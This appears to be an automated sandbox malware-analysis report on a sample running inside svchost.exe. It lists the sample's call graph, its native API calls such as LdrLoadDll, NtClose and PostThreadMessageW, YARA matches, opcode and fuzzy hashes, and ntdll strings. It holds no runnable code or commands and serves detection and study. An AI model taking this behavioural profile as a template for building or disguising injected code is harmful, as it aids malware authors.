                                Total number of Limit Nodes:9
                                execution_graph 78850 42bf63 78851 42bf80 78850->78851 78854 3c72df0 LdrInitializeThunk 78851->78854 78852 42bfa8 78854->78852 78855 4250a3 78856 4250bc 78855->78856 78857 425104 78856->78857 78860 425147 78856->78860 78862 42514c 78856->78862 78863 42ea73 78857->78863 78861 42ea73 RtlFreeHeap 78860->78861 78861->78862 78866 42cce3 78863->78866 78865 425114 78867 42cd00 78866->78867 78868 42cd11 RtlFreeHeap 78867->78868 78868->78865 78968 42eb53 78971 42cc93 78968->78971 78970 42eb6e 78972 42ccad 78971->78972 78973 42ccbe RtlAllocateHeap 78972->78973 78973->78970 78974 424d13 78975 424d2f 78974->78975 78976 424d57 78975->78976 78977 424d6b 78975->78977 78978 42c973 NtClose 78976->78978 78979 42c973 NtClose 78977->78979 78980 424d60 78978->78980 78981 424d74 78979->78981 78984 42eb93 RtlAllocateHeap 78981->78984 78983 424d7f 78984->78983 78985 42fc93 78986 42ea73 RtlFreeHeap 78985->78986 78987 42fca8 78986->78987 78869 413fc3 78871 413fe9 78869->78871 78870 414013 78871->78870 78873 413d43 LdrInitializeThunk 78871->78873 78873->78870 78874 41e7e3 78875 41e809 78874->78875 78879 41e900 78875->78879 78880 42fcd3 RtlAllocateHeap RtlFreeHeap 78875->78880 78877 41e89e 78877->78879 78881 42bfb3 78877->78881 78880->78877 78882 42bfd0 78881->78882 78885 3c72c0a 78882->78885 78883 42bffc 78883->78879 78886 3c72c11 78885->78886 78887 3c72c1f LdrInitializeThunk 78885->78887 78886->78883 78887->78883 78988 4190d3 78990 419103 78988->78990 78991 41912f 78990->78991 78992 41b5e3 78990->78992 78993 41b627 78992->78993 78994 42c973 NtClose 78993->78994 78995 41b648 78993->78995 78994->78995 78995->78990 78996 4142b3 78997 4142cd 78996->78997 79002 417a63 78997->79002 78999 4142eb 79000 414330 78999->79000 79001 41431f PostThreadMessageW 78999->79001 79001->79000 79003 417a87 79002->79003 79004 417a8e 79003->79004 79005 417ad3 LdrLoadDll 79003->79005 79004->78999 79005->79004 78888 3c72b60 LdrInitializeThunk 79006 413d9a 79007 413d47 79006->79007 79010 413da5 79006->79010 79011 42cbf3 79007->79011 79012 42cc0d 79011->79012 79015 3c72c70 LdrInitializeThunk 79012->79015 79013 413d65 79015->79013 78889 4019ec 78890 4019fb 78889->78890 78890->78890 78893 430103 78890->78893 78896 42e5f3 78893->78896 78897 42e617 78896->78897 78908 4074b3 78897->78908 78899 42e640 78907 401aa8 78899->78907 78911 41b3f3 78899->78911 78901 42e65f 78904 42e674 78901->78904 78926 42cd33 78901->78926 78922 428633 78904->78922 78905 42e68e 78906 42cd33 ExitProcess 78905->78906 78906->78907 78929 416723 78908->78929 78910 4074c0 78910->78899 78912 41b41f 78911->78912 78940 41b2e3 78912->78940 78915 41b44c 78919 41b457 78915->78919 78946 42c973 78915->78946 78916 41b464 78917 41b480 78916->78917 78920 42c973 NtClose 78916->78920 78917->78901 78919->78901 78921 41b476 78920->78921 78921->78901 78923 428694 78922->78923 78925 4286a1 78923->78925 78954 4188d3 78923->78954 78925->78905 78927 42cd50 78926->78927 78928 42cd61 ExitProcess 78927->78928 78928->78904 78930 416740 78929->78930 78932 416759 78930->78932 78933 42d3c3 78930->78933 78932->78910 78935 42d3dd 78933->78935 78934 42d40c 78934->78932 78935->78934 78936 42bfb3 LdrInitializeThunk 78935->78936 78937 42d46c 78936->78937 78938 42ea73 RtlFreeHeap 78937->78938 78939 42d485 78938->78939 78939->78932 78941 41b2fd 78940->78941 78945 41b3d9 78940->78945 78949 42c053 78941->78949 78944 42c973 NtClose 78944->78945 78945->78915 78945->78916 78947 42c98d 78946->78947 78948 42c99e NtClose 78947->78948 78948->78919 78950 42c070 78949->78950 78953 3c735c0 LdrInitializeThunk 78950->78953 78951 41b3cd 78951->78944 78953->78951 78956 4188fd 78954->78956 78955 418e0b 78955->78925 78956->78955 78962 413f23 78956->78962 78958 418a2a 78958->78955 78959 42ea73 RtlFreeHeap 78958->78959 78960 418a42 78959->78960 78960->78955 78961 42cd33 ExitProcess 78960->78961 78961->78955 78966 413f43 78962->78966 78964 413fac 78964->78958 78965 413fa2 78965->78958 78966->78964 78967 41b703 RtlFreeHeap LdrInitializeThunk 78966->78967 78967->78965

                                Executed Functions

                                Function 00417A63 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 58 417a63-417a7f 59 417a87-417a8c 58->59 60 417a82 call 42f773 58->60 61 417a92-417aa0 call 42fd73 59->61 62 417a8e-417a91 59->62 60->59 65 417ab0-417ac1 call 42e0c3 61->65 66 417aa2-417aad call 430013 61->66 71 417ac3-417ad7 LdrLoadDll 65->71 72 417ada-417add 65->72 66->65 71->72
                                APIs
                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417AD5
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396167020.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                Yara matches
                                Similarity
                                • API ID: Load
                                • String ID:
                                • API String ID: 2234796835-0
                                • Opcode ID: b5941047abcb2dd0c0d4caa8a322ddd4714e5f804c4b6bfaa926e623e5ba137e
                                • Instruction ID: 17c65a1558b630e14ed7ef3f9739d1832355270e104f84b9d800071fc6e0eb16
                                • Opcode Fuzzy Hash: b5941047abcb2dd0c0d4caa8a322ddd4714e5f804c4b6bfaa926e623e5ba137e
                                • Instruction Fuzzy Hash: CB011EB5E4020DBBDB10DAE5DC42FDEB3789F54308F0081AAE90897241F675EB588B95
                                Function 0042C973 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 90 42c973-42c9ac call 4048a3 call 42dbb3 NtClose
                                APIs
                                • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C9A7
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396167020.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                Yara matches
                                Similarity
                                • API ID: Close
                                • String ID:
                                • API String ID: 3535843008-0
                                • Opcode ID: 22432ed522a94bcda8dcec36e25b4aed746366b1cb660c800082fd29abc27255
                                • Instruction ID: 96f2c1f6fc865a6a98fa00e01e985140729075c2c81fe30e3ec650c2dba4ec36
                                • Opcode Fuzzy Hash: 22432ed522a94bcda8dcec36e25b4aed746366b1cb660c800082fd29abc27255
                                • Instruction Fuzzy Hash: 27E04F762002147BD210BA5ADC42F9B775CDFC5714F40446AFB5C67281C6B47A1186E4
                                Function 03C735C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 107 3c735c0-3c735cc LdrInitializeThunk
                                APIs
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 5bca34654696f2cbbf3747880e1d8e7bff62dc23291a9053aa2bdc52fdc656fb
                                • Instruction ID: f1b3a564e57d8db6d791bfe30329b27628126f33dd2ff5f3408a1d0e42f20d15
                                • Opcode Fuzzy Hash: 5bca34654696f2cbbf3747880e1d8e7bff62dc23291a9053aa2bdc52fdc656fb
                                • Instruction Fuzzy Hash: 7D90027160560802D101B2584554786100687D0705FA6C411A042C5ACD87958B5165A2
                                Function 03C72B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 104 3c72b60-3c72b6c LdrInitializeThunk
                                APIs
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 177a777725175a310be796602bea5ce4e703806b62e828f0dd9dbdf77bb4c699
                                • Instruction ID: a7d954574f12c2a64cadd64d7e6835217944f3637fb12dd8db4a44f45c985589
                                • Opcode Fuzzy Hash: 177a777725175a310be796602bea5ce4e703806b62e828f0dd9dbdf77bb4c699
                                • Instruction Fuzzy Hash: B09002A1202504034106B2584454696400B87E0705B96C021E101C5D4DC6258A916125
                                Function 03C72DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 106 3c72df0-3c72dfc LdrInitializeThunk
                                APIs
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: a8962f70cba8c53e356e32ee86b3fe82e696817c8a9c7b6f7a4d94c0892e40e6
                                • Instruction ID: 4f6675d3e3273099332e0c4ed8d15174d0278e718619d66f0ff73dc14f53d2cb
                                • Opcode Fuzzy Hash: a8962f70cba8c53e356e32ee86b3fe82e696817c8a9c7b6f7a4d94c0892e40e6
                                • Instruction Fuzzy Hash: 4590027120150813D112B2584544787000A87D0745FD6C412A042C59CD97568B52A121
                                Function 03C72C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 105 3c72c70-3c72c7c LdrInitializeThunk
                                APIs
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 7f49764909e6e396c5a00fc965032020b2cfabe2e868c55be8d0337420572be7
                                • Instruction ID: 598963207200d24d0577c0f5483c3fdcfccdafd67aeaeeeddfda3b6d8db47470
                                • Opcode Fuzzy Hash: 7f49764909e6e396c5a00fc965032020b2cfabe2e868c55be8d0337420572be7
                                • Instruction Fuzzy Hash: 5C90027120158C02D111B25884447CA000687D0705F9AC411A442C69CD87958A917121
                                Function 004188D3 Relevance: .4, Instructions: 437COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396167020.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ebbbbd0d25b4de6d9282d7635e66a5b4694341d58006b79c7222e21f8a68c9e7
                                • Instruction ID: dd0b7a3bf046abbf4c455918637e7ce467e693167d2b2b3e777def381e372817
                                • Opcode Fuzzy Hash: ebbbbd0d25b4de6d9282d7635e66a5b4694341d58006b79c7222e21f8a68c9e7
                                • Instruction Fuzzy Hash: 10F1C4B0E0021AAFDB24CF65DC81AEEF778AF44304F14819EE505A7341EB746A85CFA5
                                Function 004142AC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63threadwindowCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • PostThreadMessageW.USER32(x--942kI,00000111,00000000,00000000), ref: 0041432A
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396167020.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                Yara matches
                                Similarity
                                • API ID: MessagePostThread
                                • String ID: x--942kI$x--942kI
                                • API String ID: 1836367815-3264443583
                                • Opcode ID: 1f8b0ee1065be87c6f5f69fcd1f1c2052f28c8eaaf5ea610a1661125dc98e1d8
                                • Instruction ID: c662b3dbe2c64d1ddfd02a55587fce73b7b1dc2b5ce02e25ae0f1613f7d45ff1
                                • Opcode Fuzzy Hash: 1f8b0ee1065be87c6f5f69fcd1f1c2052f28c8eaaf5ea610a1661125dc98e1d8
                                • Instruction Fuzzy Hash: A311C2B1E0021C7ADB11EAE59C82DEFBB7CDF40798F408069FA14A7241D6384E078BA1
                                Function 004142B3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 14 4142b3-4142c5 15 4142cd-41431d call 42f523 call 417a63 call 404813 call 4251c3 14->15 16 4142c8 call 42eb13 14->16 25 41433d-414343 15->25 26 41431f-41432e PostThreadMessageW 15->26 16->15 26->25 27 414330-41433a 26->27 27->25
                                APIs
                                • PostThreadMessageW.USER32(x--942kI,00000111,00000000,00000000), ref: 0041432A
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396167020.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                Yara matches
                                Similarity
                                • API ID: MessagePostThread
                                • String ID: x--942kI$x--942kI
                                • API String ID: 1836367815-3264443583
                                • Opcode ID: b31c7483368ed882565f495158e5e6ac230c4fc10fededf3af10e43e50afc508
                                • Instruction ID: 730e7c5126da808e8d24c35ec5c01283d2ea1c168341f48d7324cf535e5df4a1
                                • Opcode Fuzzy Hash: b31c7483368ed882565f495158e5e6ac230c4fc10fededf3af10e43e50afc508
                                • Instruction Fuzzy Hash: F901C871E0111C7ADB10AAD19C81DEF7B7CDF41798F408069FA1467241D5384E068BA5
                                Function 00417B3E Relevance: 1.5, APIs: 1, Instructions: 29libraryloaderCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 74 417b3e-417b3f 75 417b41-417b51 74->75 76 417ad3-417ad7 LdrLoadDll 74->76 78 417b53-417b60 75->78 79 417b04-417b17 75->79 77 417ada-417add 76->77 79->74
                                APIs
                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417AD5
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396167020.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                Yara matches
                                Similarity
                                • API ID: Load
                                • String ID:
                                • API String ID: 2234796835-0
                                • Opcode ID: 9677c3357508946fb9689ba191a252805c1e0554e375d0d184631c79b80061dd
                                • Instruction ID: fa7c3a2abadc5a64d3fea80c469bef7b7b6eab7328c4a2072c9369565ed97b0a
                                • Opcode Fuzzy Hash: 9677c3357508946fb9689ba191a252805c1e0554e375d0d184631c79b80061dd
                                • Instruction Fuzzy Hash: 63E061B254D04D5FCA01C554C9937D973B7E756341F5C0485C9949B3C1D2835A99C581
                                Function 0042CCE3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 85 42cce3-42cd27 call 4048a3 call 42dbb3 RtlFreeHeap
                                APIs
                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,FFFFFF25,00000007,00000000,00000004,00000000,004172EC,000000F4), ref: 0042CD22
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396167020.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                Yara matches
                                Similarity
                                • API ID: FreeHeap
                                • String ID:
                                • API String ID: 3298025750-0
                                • Opcode ID: 019197832f6eff579422691448a70330b4c9004201574030ccc2afcfe941c309
                                • Instruction ID: 8815a22e036bd17cf4a3328eb93e5cc5c630137e414961e31a1fe98064c3533e
                                • Opcode Fuzzy Hash: 019197832f6eff579422691448a70330b4c9004201574030ccc2afcfe941c309
                                • Instruction Fuzzy Hash: 5AE06DB62042087BD610EE59EC41FDB77ACEFC4710F40441AFE08A7241D774B9108BB8
                                Function 0042CC93 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 80 42cc93-42ccd4 call 4048a3 call 42dbb3 RtlAllocateHeap
                                APIs
                                • RtlAllocateHeap.NTDLL(?,0041E89E,?,?,00000000,?,0041E89E,?,?,?), ref: 0042CCCF
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396167020.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                • Opcode ID: 30499aa17e4f1211dfaaf0cbcd2cf61140ea0225b6a84e5f882a9587f6441476
                                • Instruction ID: 53960163ce4b3b6e875cfcc82aad222dea0daa810f29cc8aaf0109dc9d234f33
                                • Opcode Fuzzy Hash: 30499aa17e4f1211dfaaf0cbcd2cf61140ea0225b6a84e5f882a9587f6441476
                                • Instruction Fuzzy Hash: 1EE06DB66042147BD610EE99EC41F9B37ACDFC9710F404419FA08A7282D670B9108AB8
                                Function 0042CD33 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 95 42cd33-42cd6f call 4048a3 call 42dbb3 ExitProcess
                                APIs
                                • ExitProcess.KERNEL32(?,00000000,00000000,?,DB72A70C,?,?,DB72A70C), ref: 0042CD6A
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396167020.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID:
                                • API String ID: 621844428-0
                                • Opcode ID: a4c0a1dd8b759ecb090ba1dc3bcff74eddbda1d90c0082f3a670368a41aec86d
                                • Instruction ID: aaa9a0667dc153527cbe5447b146a1b73a98059b386279cd8bbc514fb0f370bf
                                • Opcode Fuzzy Hash: a4c0a1dd8b759ecb090ba1dc3bcff74eddbda1d90c0082f3a670368a41aec86d
                                • Instruction Fuzzy Hash: 3BE086362002147BD110FB5ADC41F9B775CDFC5714F01445AFA4867281CAB5791187F4
                                Function 03C72C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 100 3c72c0a-3c72c0f 101 3c72c11-3c72c18 100->101 102 3c72c1f-3c72c26 LdrInitializeThunk 100->102
                                APIs
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: a16fcdf74d2bc20d479bfc1b40779c81524d566da9a16b9921cb4237f4bbbc4d
                                • Instruction ID: 84faa90233bd227a4f600780950a8624567ebc6a859d33608038aac95c8ba62c
                                • Opcode Fuzzy Hash: a16fcdf74d2bc20d479bfc1b40779c81524d566da9a16b9921cb4237f4bbbc4d
                                • Instruction Fuzzy Hash: 73B09BB19015C5C5EA11F7604608757790567D0745F5AC461D303C685E4739C2D1E175

                                Non-executed Functions

                                Function 03CB2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                • API String ID: 0-2160512332
                                • Opcode ID: 288e1e2061f0e560c1dd85e3aa0938031b745a8c7eb562ba4d2397e9e79fb1f0
                                • Instruction ID: aeea6575664b303b0d03bbeb9d9d32d519b3d40015c05f24726aacc197937762
                                • Opcode Fuzzy Hash: 288e1e2061f0e560c1dd85e3aa0938031b745a8c7eb562ba4d2397e9e79fb1f0
                                • Instruction Fuzzy Hash: E0928A75608381AFD720DE25C884BABB7F8BB88754F084D2DFA95DB250D770E944CB92
                                Function 03C268B8 Relevance: 19.0, Strings: 15, Instructions: 249COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim engine DLL$LdrpGetShimEngineInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_InitializeEngine$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
                                • API String ID: 0-3089669407
                                • Opcode ID: f0b0b3b2124a67d30191e30d4c985eb85e128119bee2b4c3c945b5e594545fbc
                                • Instruction ID: d588cd32f61ebcebc7f05e536a58118ac9464702c7f9479a09029d78cee04501
                                • Opcode Fuzzy Hash: f0b0b3b2124a67d30191e30d4c985eb85e128119bee2b4c3c945b5e594545fbc
                                • Instruction Fuzzy Hash: 878102B7D012186F8B61FBA9EDD4EEEB7BDAB15610B054421B910FB114E730EE149BA0
                                Function 03C60F30 Relevance: 13.3, Strings: 10, Instructions: 764COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
                                • API String ID: 0-360209818
                                • Opcode ID: 64b5ff52d93c276132cabac26c0ae2b4e33db46889f9b67e54d234a6c3c567d8
                                • Instruction ID: f0a406c1a77317f2a9fa110da154a49533f6ec074b94398c4abf49b7417cf60d
                                • Opcode Fuzzy Hash: 64b5ff52d93c276132cabac26c0ae2b4e33db46889f9b67e54d234a6c3c567d8
                                • Instruction Fuzzy Hash: 40629EB5E0062A8FDB24CF19C8817A9B7B6EF95324F5D82DAD449EB240D7325AD1CF40
                                Function 03CE12ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                • API String ID: 0-3591852110
                                • Opcode ID: 559c681ff0a6db9ad874a2e583ca350f765f3cf5d0e85e41477cb1bd899656f3
                                • Instruction ID: 9d7dce24789fb40ff977518bff5a74f094d714bea92837fdc4a33fbe62415a4c
                                • Opcode Fuzzy Hash: 559c681ff0a6db9ad874a2e583ca350f765f3cf5d0e85e41477cb1bd899656f3
                                • Instruction Fuzzy Hash: 1712C9756046829FC725DF29C440BBABBF5EF09704F0D8459E496CF682D738E9A0DB50
                                Function 03C4AD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                • API String ID: 0-3197712848
                                • Opcode ID: 91b51e84e04cbc1c1f3161e6bbccb384ea242484c0d4018e4965aea5ab0109e8
                                • Instruction ID: 0b0734e5c73153479c2bd55b09ad55b38121e054f148dc18df8cd6ed864b99f0
                                • Opcode Fuzzy Hash: 91b51e84e04cbc1c1f3161e6bbccb384ea242484c0d4018e4965aea5ab0109e8
                                • Instruction Fuzzy Hash: F512D0B5A083418FE724DF28C844BAAB7E4FF95704F09095AF985CF291E774DA44CB92
                                Function 03C2D34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                • API String ID: 0-3532704233
                                • Opcode ID: 474648e7b9e6e471f576550b34da2389b892e15d7c7e8e36fc944c59ba8f6a52
                                • Instruction ID: 0f740e15b3622867d23963a33acda5f9c426cec1905d1b5820c944a0b7c0678c
                                • Opcode Fuzzy Hash: 474648e7b9e6e471f576550b34da2389b892e15d7c7e8e36fc944c59ba8f6a52
                                • Instruction Fuzzy Hash: 1DB1BFB65083619FC711EF24C484B6BBBE8AF98744F054D2EF89ADB240D770DA44CB92
                                Function 03CE0CB5 Relevance: 10.4, Strings: 8, Instructions: 402COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                • API String ID: 0-1357697941
                                • Opcode ID: a87246f26af38fe3f0541ec659cae006ac0a4ae8bdea3abd8373c415b5d9af29
                                • Instruction ID: 3b88b63462c6dc64b6b04823535882c25e339b61c75c4c5f2c59a91c93b5650f
                                • Opcode Fuzzy Hash: a87246f26af38fe3f0541ec659cae006ac0a4ae8bdea3abd8373c415b5d9af29
                                • Instruction Fuzzy Hash: DBF11575A047A5EFCB25DF6AC441BAAFBF5FF09700F088069E481DB242C774AA45DB90
                                Function 03CC9179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                • API String ID: 0-3063724069
